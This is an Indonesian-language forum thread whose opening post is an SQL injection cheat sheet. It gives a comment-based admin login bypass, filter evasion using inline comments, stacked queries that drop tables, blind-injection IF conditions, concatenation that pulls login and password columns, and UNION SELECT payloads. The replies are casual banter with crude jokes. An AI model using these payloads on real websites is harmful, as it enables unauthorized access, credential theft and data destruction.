Results 1 to 7 of 7

Thread: Simple SQL Injection Tutorial1582 days old

  1. #1
    mb4h gaul's Avatar
    [ds2] C A D E T

    Status
    Offline
    Join Date
    Oct 2012
    Location
    Surabaya
    Posts
    897
    Gender

    Thanks
    56
    Thanked 148 Times in 26 Posts

    Achievements:
    Three FriendsYour first GroupTagger Second Class5000 Experience PointsVeteran

    Simple SQL Injection Tutorial

    This information is for educational purpose only.
    Please use this information wisely.
    Udah pada tau kan soal SQL injection?
    Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
    Itu tutorial basic, sekarang kita ke tutorial advance.
    Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
    untuk menginject suatu website (jika emang bisa diinject).
    Oke, lets’ begin

    Syntax SQL Injection
    1. Commenting out.
    Gunanya untuk mengakhiri suatu query, bypass query.
    + SQL Server
    Syntax: –
    Penggunaan: DROP namatabel;–
    + MySQL
    Syntax: #
    Penggunaan: DROP namatabel;#
    Contoh penggunaan in real life:
    * Username: admin’–
    * Proses query yang terjadi di server:
    SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
    Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan

    2. Inline comment
    Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
    + SQL Server (MySQL juga bisa)
    Syntax: /*Comment*/
    Penggunaan: DROP/*comment*/namatabel
    atau: DR/**/OP/*bypass proteksi*/namatabel
    atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
    + MySQL (mendeteksi versi)
    Syntax: /*!MYSQL Special SQL*/
    Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
    Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

    3. Staking queries
    Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
    + SQL Server
    Syntax: ;
    Penggunaan: SELECT * FROM namatabel; DROP namatabel–
    4. Pernyataan IF
    Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
    + SQL Server
    Syntax: IF kondisi bagian-true ELSE bagian-false
    Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
    + MySQL
    Syntax: IF(kondisi,bagian-true,bagian-false)
    Penggunaan: SELECT IF(1=1,’true’,’false’)
    5. Operasi String
    Gunanya untuk bypass proteksi
    + SQL Server
    Syntax: +
    Penggunaan: SELECT login + ‘-’ + password FROM userlist
    + MySQL Server
    Syntax: ||
    P
    enggunaan: SELECT login || ‘-’ || password FROM userlist
    Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
    Syntax: CONCAT(str1,str2,str3,…)
    Penggunaan: SELECT CONCAT(login,password) FROM userlist
    6. Union Injection
    Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
    Syntax: UNION
    Penggunaan: ‘ UNION SELECT * FROM namatabel
    atau: ‘ UNION ALL SELECT * FROM namatabel
    atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
    Proses yang terjadi dalam query:
    SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
    Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
    Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
    - Enjoy -
    Last edited by mb4h gaul; 23-10-2012 at 06:28 PM.
    Sehat Sampai Uzur

  2. Members berikut yang memberikan 'Thanks' kepada mb4h gaul untuk Thread ini:

    iikica (18-11-2012)

  3. #2
    sakti's Avatar
    [ds2] C A D E T

    Status
    Offline
    Join Date
    Oct 2012
    Location
    Antara Surga dan Neraka
    Posts
    434
    Gender

    Thanks
    94
    Thanked 117 Times in 48 Posts

    Achievements:
    Three Friends1000 Experience Points1 year registered
    hehehehehe.... si mbah udah mulai unjuk gigi disini
    masih ingat ama sama ane nggak
    DuniaSex Episode-2
    Yacht | "Let's Cruise To Fantasy Community"

    Keep Enjoying the Cruise

  4. #3
    mb4h gaul's Avatar
    [ds2] C A D E T

    Status
    Offline
    Join Date
    Oct 2012
    Location
    Surabaya
    Posts
    897
    Gender

    Thanks
    56
    Thanked 148 Times in 26 Posts

    Achievements:
    Three FriendsYour first GroupTagger Second Class5000 Experience PointsVeteran
    eleng bro
    piye kabar e
    DuniaSex Episode-2
    Yacht | "Let's Cruise To Fantasy Community"

    Keep Enjoying the Cruise

  5. #4
    sakti's Avatar
    [ds2] C A D E T

    Status
    Offline
    Join Date
    Oct 2012
    Location
    Antara Surga dan Neraka
    Posts
    434
    Gender

    Thanks
    94
    Thanked 117 Times in 48 Posts

    Achievements:
    Three Friends1000 Experience Points1 year registered
    baik mbah...
    hehehehe pada ngumpul lagi.....
    MEONG

  6. #5
    mb4h gaul's Avatar
    [ds2] C A D E T

    Status
    Offline
    Join Date
    Oct 2012
    Location
    Surabaya
    Posts
    897
    Gender

    Thanks
    56
    Thanked 148 Times in 26 Posts

    Achievements:
    Three FriendsYour first GroupTagger Second Class5000 Experience PointsVeteran
    Quote Originally Posted by sakti View Post
    baik mbah...
    hehehehe pada ngumpul lagi.....
    ayo keluarkan lagi yang dulu
    ente kan jagonya
    Sehat Sampai Uzur

  7. #6
    dani_degnito's Avatar
    [ds2] Silver Class

    Status
    Offline
    Join Date
    Oct 2012
    Location
    BSD
    Age
    33
    Posts
    187
    Gender

    Thanks
    91
    Thanked 2 Times in 2 Posts

    Achievements:
    Created Album pictures1000 Experience PointsVeteran
    jago nyemesh pastinya???
    DuniaSex Episode-2
    Yacht | "Let's Cruise To Fantasy Community"

    Keep Enjoying the Cruise

  8. #7
    sakti's Avatar
    [ds2] C A D E T

    Status
    Offline
    Join Date
    Oct 2012
    Location
    Antara Surga dan Neraka
    Posts
    434
    Gender

    Thanks
    94
    Thanked 117 Times in 48 Posts

    Achievements:
    Three Friends1000 Experience Points1 year registered
    Quote Originally Posted by dani_degnito View Post
    jago nyemesh pastinya???
    jago nenen ama ninabobo ama noni2 cantik
    MEONG

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •